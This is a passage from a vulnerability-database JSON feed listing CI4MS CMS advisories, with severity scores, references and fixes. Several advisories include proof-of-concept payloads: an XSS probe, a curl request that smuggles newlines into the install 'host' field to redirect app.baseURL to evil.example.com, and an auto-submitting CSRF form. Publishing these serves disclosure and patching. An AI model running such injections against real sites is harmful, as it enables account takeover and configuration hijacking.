**deleted**.\n- Enforce account status checks on every authenticated request, not only during login.\n- Introduce proper session expiration or account expiration mechanisms to prevent indefinite access.\n- Correct the backend logic flaw to ensure access control behavior aligns with intended security design and does not rely on unsafe trust assumptions.\n\n# Ready Video POC:\nhttps://mega.nz/file/7dlUTQAB#0oXOapF5XYN4DRRG1xYj6DajmuP72MpMdsHqbVBMmWw", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34570", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00035", "scoring_system": "epss", "scoring_elements": "0.10879", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00035", "scoring_system": "epss", "scoring_elements": "0.10843", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00035", "scoring_system": "epss", "scoring_elements": "0.10889", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00041", "scoring_system": "epss", "scoring_elements": "0.12843", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34570" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-03T16:40:59Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-4vxv-4xq4-p84h", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-03T16:40:59Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-4vxv-4xq4-p84h" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34570", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34570" }, { "reference_url": "https://github.com/advisories/GHSA-4vxv-4xq4-p84h", "reference_id": "GHSA-4vxv-4xq4-p84h", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-4vxv-4xq4-p84h" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1002519?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2v9s-x9dt-8ugb" }, { "vulnerability": "VCID-6nzs-j8gz-9ucu" }, { "vulnerability": "VCID-8x3z-1p5j-6qfa" }, { "vulnerability": "VCID-c1ux-y4qk-xfch" }, { "vulnerability": "VCID-e9xp-rar3-c7bp" }, { "vulnerability": "VCID-fjcm-syrk-87fg" }, { "vulnerability": "VCID-j32w-tcpz-1fak" }, { "vulnerability": "VCID-mds3-7xh3-mkgv" }, { "vulnerability": "VCID-p1q2-w18a-3kae" }, { "vulnerability": "VCID-qrag-mndk-xbb7" }, { "vulnerability": "VCID-ux28-acyz-kqd1" }, { "vulnerability": "VCID-w12h-33nr-bufh" }, { "vulnerability": "VCID-ye3h-3tu7-p3e7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/109898?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0%2B0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0%252B0" } ], "aliases": [ "CVE-2026-34570", "GHSA-4vxv-4xq4-p84h" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-tje9-d65v-bbd4" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89858?format=api", "vulnerability_id": "VCID-ux28-acyz-kqd1", "summary": "CI4MS: Backup Management Full Account Takeover for All Roles & Privilege Escalation via Stored DOM Blind XSS\nAn attacker can achieve Full Account Takeover and Privilege Escalation via Stored DOM XSS in the backup module's filename field, which is manipulated through an SQL file that tampers with the filename field to contain a hidden XSS payload.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41201", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00057", "scoring_system": "epss", "scoring_elements": "0.18273", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00057", "scoring_system": "epss", "scoring_elements": "0.18239", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00057", "scoring_system": "epss", "scoring_elements": "0.18277", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00063", "scoring_system": "epss", "scoring_elements": "0.19614", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41201" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.5.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H" }, { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T14:07:25Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.5.0" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-qxpq-82f3-xj47", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H" }, { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T14:07:25Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-qxpq-82f3-xj47" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41201", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41201" }, { "reference_url": "https://github.com/advisories/GHSA-qxpq-82f3-xj47", "reference_id": "GHSA-qxpq-82f3-xj47", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qxpq-82f3-xj47" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1126288?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.5", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/1041566?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.5.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-cd9w-5f22-xkfk" }, { "vulnerability": "VCID-fjcm-syrk-87fg" }, { "vulnerability": "VCID-qrag-mndk-xbb7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.5.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/110106?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.5%2B0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.5%252B0" } ], "aliases": [ "CVE-2026-41201", "GHSA-qxpq-82f3-xj47" ], "risk_score": 4.1, "exploitability": "0.5", "weighted_severity": "8.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ux28-acyz-kqd1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89291?format=api", "vulnerability_id": "VCID-vjxw-3q1u-f3az", "summary": "CI4MS: Menu Management (Posts) Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS\n## Summary\n### **Vulnerability: Stored DOM XSS via Posts Added to Menu (Persistent Payload Injection)**\n- Stored Cross-Site Scripting via Unsafe Rendering of Post Entries in Menu Management\n\n### Description\nThe application fails to properly sanitize user-controlled input when **adding Posts to navigation menus** through the Menu Management functionality. Post-related data selected via the Posts section is stored server-side and rendered without proper output encoding.\n\nThese stored values are later rendered unsafely within administrative dashboards and public-facing navigation menus, resulting in stored DOM-based cross-site scripting (XSS).\n\n### Affected Functionality\n- Menu Management – Posts section\n- Adding posts to navigation menus\n- Menu storage and rendering logic\n\n### Attack Scenario\n- An attacker creates or controls a post containing a malicious JavaScript payload.\n- The attacker adds the post to the menu using the **Posts** functionality in Menu Manager.\n- The application stores the menu entry without sanitization or encoding.\n- The payload persists and executes whenever the menu is rendered.\n\n### Impact\n- Persistent Stored DOM XSS\n- Execution of arbitrary JavaScript in victims’ browsers\n- Privilege escalation in administrative contexts\n- Full administrator account takeover\n- Full account takeover across all roles\n- Full compromise of the entire application via global navigation execution\n\nEndpoint:\n- `/backend/menu/`\n\n## Steps To Reproduce (POC)\n1. Navigate to Menu Management\n2. Use the **Posts** section to add a post containing an XSS payload such as:\n`<img src=x onerror=alert(document.domain)>`\n3. Save the menu\n4. View the menu in the administrative panel or any public-facing page\n5. Observe the JavaScript payload executing automatically\n\n## Remediation\n\n- **Avoid unsafe DOM manipulation methods:** Do not use `.html()`, `innerHTML`, or similar sink functions in client-side JavaScript or server-side templating (e.g., PHP). Even when user input flowing into these sinks is not immediately apparent, they can introduce Cross-Site Scripting (XSS) vulnerabilities that an attacker may exploit.\n\n- **Apply output encoding:** Implement HTML entity encoding on all user-controlled data before rendering it in the browser. This helps neutralize potentially malicious input.\n\n- **Implement input sanitization:** Ensure that all user-supplied input is properly sanitized before processing or output. Currently, no sanitization mechanisms are in place, which should be addressed as a priority.\n\n- **Enforce security headers and cookie attributes:**\n - **Content Security Policy (CSP):** Define and enforce a strict CSP to limit the execution of unauthorized scripts.\n - **HttpOnly flag:** Set the `HttpOnly` attribute on session cookies to prevent client-side script access.\n - **SameSite attribute:** Configure the `SameSite` cookie attribute to mitigate Cross-Site Request Forgery (CSRF) risks.\n - **Secure flag:** Ensure all cookies are transmitted only over HTTPS by enabling the `Secure` attribute.\n\n These measures collectively reduce the impact of XSS and help prevent escalation paths such as CSRF via XSS.\n\n# Ready Video POC:\nhttps://mega.nz/file/PcMiUA5K#L2RlZJa340Q8K42TksxiXMuo_9XsRYPi14-WvBnak2A", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34565", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15923", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15872", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15912", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00058", "scoring_system": "epss", "scoring_elements": "0.18292", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34565" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-02T18:08:32Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-xgh5-w62m-8mpr", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-02T18:08:32Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-xgh5-w62m-8mpr" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34565", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34565" }, { "reference_url": "https://github.com/advisories/GHSA-xgh5-w62m-8mpr", "reference_id": "GHSA-xgh5-w62m-8mpr", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-xgh5-w62m-8mpr" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1002519?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2v9s-x9dt-8ugb" }, { "vulnerability": "VCID-6nzs-j8gz-9ucu" }, { "vulnerability": "VCID-8x3z-1p5j-6qfa" }, { "vulnerability": "VCID-c1ux-y4qk-xfch" }, { "vulnerability": "VCID-e9xp-rar3-c7bp" }, { "vulnerability": "VCID-fjcm-syrk-87fg" }, { "vulnerability": "VCID-j32w-tcpz-1fak" }, { "vulnerability": "VCID-mds3-7xh3-mkgv" }, { "vulnerability": "VCID-p1q2-w18a-3kae" }, { "vulnerability": "VCID-qrag-mndk-xbb7" }, { "vulnerability": "VCID-ux28-acyz-kqd1" }, { "vulnerability": "VCID-w12h-33nr-bufh" }, { "vulnerability": "VCID-ye3h-3tu7-p3e7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/109898?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0%2B0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0%252B0" } ], "aliases": [ "CVE-2026-34565", "GHSA-xgh5-w62m-8mpr" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-vjxw-3q1u-f3az" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89210?format=api", "vulnerability_id": "VCID-w12h-33nr-bufh", "summary": "CI4MS Vulnerable to .env CRLF Injection via Unvalidated `host` Parameter in Install Controller\n## Summary\n\nThe `Install::index()` controller reads the `host` POST parameter without any validation and passes it directly into `updateEnvSettings()`, which writes it into the `.env` file via `preg_replace()`. Because newline characters in the value are not stripped, an attacker can inject arbitrary configuration directives into the `.env` file. The install routes have CSRF protection explicitly disabled, and the `InstallFilter` can be bypassed when `cache('settings')` is empty (cache expiry or fresh deployment).\n\n## Details\n\nIn `modules/Install/Controllers/Install.php`, the `$valData` array (lines 13-27) defines validation rules for all POST parameters **except** `host`. The `host` value is read at line 35:\n\n```php\n// line 32-41\n$updates = [\n 'CI_ENVIRONMENT' => 'development',\n 'app.baseURL' => '\\'' . $this->request->getPost('baseUrl') . '\\'',\n 'database.default.hostname' => $this->request->getPost('host'), // NO VALIDATION\n 'database.default.database' => $this->request->getPost('dbname'),\n // ...\n];\n```\n\nThis value is passed to `updateEnvSettings()` (lines 89-101), which uses `preg_replace` with the raw value as the replacement string:\n\n```php\n// line 94-98\nforeach ($updates as $key => $value) {\n $pattern = '/^' . preg_quote($key, '/') . '=.*/m';\n $replacement = \"{$key}={$value}\";\n if (preg_match($pattern, $contents)) $contents = preg_replace($pattern, $replacement, $contents);\n else $contents .= PHP_EOL . $replacement;\n}\n```\n\nSince the `env` template has all lines commented out (e.g., `# database.default.hostname = localhost`), the pattern does not match, and the value is appended verbatim — including any embedded newline characters. This allows injection of arbitrary key=value pairs into `.env`.\n\nThe `dbpassword` field (line 17) is a secondary vector — its validation (`permit_empty|max_length[255]`) does not reject newline characters.\n\n**Access conditions:**\n- CSRF is explicitly disabled for install routes (`InstallConfig.php:7-9`), confirmed consumed by `Filters.php:220-231,246-251`.\n- `InstallFilter` (line 13) only blocks when **both** `.env` exists **and** `cache('settings')` is populated. The endpoint is accessible during fresh install or after cache expiry/clear.\n\n**Mitigation note:** `encryption.key` injection is NOT exploitable because `generateEncryptionKey()` (line 70) runs after `updateEnvSettings()` and overwrites all `encryption.key=` lines with a cryptographically random value. However, all other `.env` settings remain injectable.\n\n## PoC\n\n**Scenario:** Application is deployed but cache has expired (or fresh install window).\n\n```bash\n# Inject app.baseURL override and disable secure requests via host parameter\n# The %0a represents a newline that creates new .env lines\ncurl -X POST 'http://target/install/' \\\n -d 'baseUrl=http://target/&dbname=ci4ms&dbusername=root&dbpassword=&dbdriver=MySQLi&dbpre=ci4ms_&dbport=3306&name=Admin&surname=User&username=admin&password=Password123&email=admin@example.com&siteName=TestSite&host=localhost%0aapp.baseURL=http://evil.example.com/%0aapp.forceGlobalSecureRequests=false%0asession.driver=CodeIgniter\\Session\\Handlers\\DatabaseHandler'\n```\n\n**Expected result:** The `.env` file will contain:\n\n```\ndatabase.default.hostname=localhost\napp.baseURL=http://evil.example.com/\napp.forceGlobalSecureRequests=false\nsession.driver=CodeIgniter\\Session\\Handlers\\DatabaseHandler\n```\n\nThese injected lines override the legitimate `app.baseURL` set earlier (CI4's DotEnv processes top-to-bottom; later values win for `putenv`), redirect the application base URL to an attacker-controlled domain, and modify session handling.\n\n**CSRF exploitation variant** (no direct access needed):\n\n```html\n<!-- Hosted on attacker site, victim admin visits while cache is empty -->\n<form id=\"f\" method=\"POST\" action=\"http://target/install/\">\n <input name=\"baseUrl\" value=\"http://target/\">\n <input name=\"host\" value=\"localhost app.baseURL='http://evil.example.com/'\">\n <!-- ... other required fields ... -->\n</form>\n<script>document.getElementById('f').submit();</script>\n```\n\n## Impact\n\nAn unauthenticated attacker can inject arbitrary configuration into the `.env` file when the install endpoint is accessible (fresh deployment or cache expiry). This enables:\n\n- **Application URL hijacking** — injecting `app.baseURL` to an attacker domain, causing password reset links, redirects, and asset loading to point to attacker infrastructure\n- **Security downgrade** — disabling `forceGlobalSecureRequests`, CSP, or other security settings\n- **Session manipulation** — changing session driver or save path configuration\n- **Full application reconfiguration** — the `copyEnvFile()` method overwrites the existing `.env` with the template before applying updates, destroying the current configuration (denial of service)\n- **Database redirect** — while not via the `host` injection itself (the host value is a legitimate DB config), injecting additional database config lines can alter connection behavior\n\nThe attack is amplified by the absence of CSRF protection on the install endpoint, allowing exploitation via a malicious webpage visited by anyone on the same network.\n\n## Recommended Fix\n\n1. **Add validation for the `host` parameter** — reject newlines and restrict to valid hostnames/IPs:\n\n```php\n// In $valData, add:\n'host' => ['label' => lang('Install.databaseHost'), 'rules' => 'required|max_length[255]|regex_match[/^[a-zA-Z0-9._-]+$/]'],\n```\n\n2. **Sanitize all values in `updateEnvSettings()`** — strip newlines from replacement strings:\n\n```php\nprivate function updateEnvSettings(array $updates)\n{\n $envPath = ROOTPATH . '.env';\n if (!file_exists($envPath)) return ['error' => \"'.env' file not found.\"];\n $contents = file_get_contents($envPath);\n foreach ($updates as $key => $value) {\n $value = str_replace([\"\\r\", \"\\n\"], '', (string) $value); // Strip CRLF\n $pattern = '/^' . preg_quote($key, '/') . '=.*/m';\n $replacement = \"{$key}={$value}\";\n if (preg_match($pattern, $contents)) $contents = preg_replace($pattern, $replacement, $contents);\n else $contents .= PHP_EOL . $replacement;\n }\n file_put_contents($envPath, $contents);\n return true;\n}\n```\n\n3. **Add newline validation to `dbpassword`** — add `regex_match[/^[^\\r\\n]*$/]` to the validation rules.\n\n4. **Strengthen `InstallFilter`** — consider checking for a more reliable installation-complete indicator than cache state (e.g., a database table existence check or a dedicated lock file).", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39394", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00032", "scoring_system": "epss", "scoring_elements": "0.09845", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00032", "scoring_system": "epss", "scoring_elements": "0.09755", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00032", "scoring_system": "epss", "scoring_elements": "0.09838", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00032", "scoring_system": "epss", "scoring_elements": "0.09864", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39394" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.4.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.4.0" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-vfhx-5459-qhqh", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-08T16:09:11Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-vfhx-5459-qhqh" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39394", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39394" }, { "reference_url": "https://github.com/advisories/GHSA-vfhx-5459-qhqh", "reference_id": "GHSA-vfhx-5459-qhqh", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-vfhx-5459-qhqh" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1015581?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.4.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-cd9w-5f22-xkfk" }, { "vulnerability": "VCID-fjcm-syrk-87fg" }, { "vulnerability": "VCID-j32w-tcpz-1fak" }, { "vulnerability": "VCID-mds3-7xh3-mkgv" }, { "vulnerability": "VCID-qrag-mndk-xbb7" }, { "vulnerability": "VCID-ux28-acyz-kqd1" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.4.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/110229?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.4%2B0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.4%252B0" } ], "aliases": [ "CVE-2026-39394", "GHSA-vfhx-5459-qhqh" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-w12h-33nr-bufh" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89443?format=api", "vulnerability_id": "VCID-x3ze-8mnc-p7ak", "summary": "CI4MS: Menu Management (Pages) Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS\n## Summary \n### **Vulnerability: Stored DOM XSS via Pages Added to Menu (Persistent Payload Injection)**\n- Stored Cross-Site Scripting via Unsafe Rendering of Page Entries in Menu Management\n\n### Description\nThe application fails to properly sanitize user-controlled input when **adding Pages to navigation menus** through the Menu Management functionality. Page-related data selected via the Pages section is stored server-side and rendered without proper output encoding.\n\nThis stored payload is later rendered unsafely within administrative interfaces and public-facing navigation menus, leading to stored DOM-based cross-site scripting (XSS).\n\n### Affected Functionality\n- Menu Management – Pages section\n- Adding pages to navigation menus\n- Menu storage and rendering logic\n\n### Attack Scenario\n- An attacker creates or controls a page containing a malicious JavaScript payload.\n- The attacker adds the page to the menu using the **Pages** functionality in Menu Manager.\n- The application stores the menu entry without sanitization or encoding.\n- The payload persists and executes whenever the menu is rendered in administrative or public-facing interfaces.\n\n### Impact\n- Persistent Stored DOM XSS\n- Execution of arbitrary JavaScript in victims’ browsers\n- Privilege escalation when viewed by administrators or privileged users\n- Full administrator account takeover\n- Full account takeover across all roles via the navigation menu\n- Full compromise of the entire application due to global execution in the navigation menu\n\n**Endpoint:**\n- `/backend/menu/`\n\n## Steps To Reproduce (POC)\n1. Navigate to the **Menu Management** section of the application.\n2. Use the **Pages** functionality to add a page containing an XSS payload such as:\n`<img src=x onerror=alert(document.domain)>`\n3. Save the menu entry.\n4. View the menu in the administrative panel or any public-facing page.\n5. Observe the JavaScript payload executing automatically when the menu is rendered.\n\n## Remediation\n\n- **Avoid unsafe DOM manipulation methods:** Do not use `.html()`, `innerHTML`, or similar sink functions in client-side JavaScript or server-side templating (e.g., PHP). Even when user input flowing into these sinks is not immediately apparent, they can introduce Cross-Site Scripting (XSS) vulnerabilities that an attacker may exploit.\n\n- **Apply output encoding:** Implement HTML entity encoding on all user-controlled data before rendering it in the browser. This helps neutralize potentially malicious input.\n\n- **Implement input sanitization:** Ensure that all user-supplied input is properly sanitized before processing or output. Currently, no sanitization mechanisms are in place, which should be addressed as 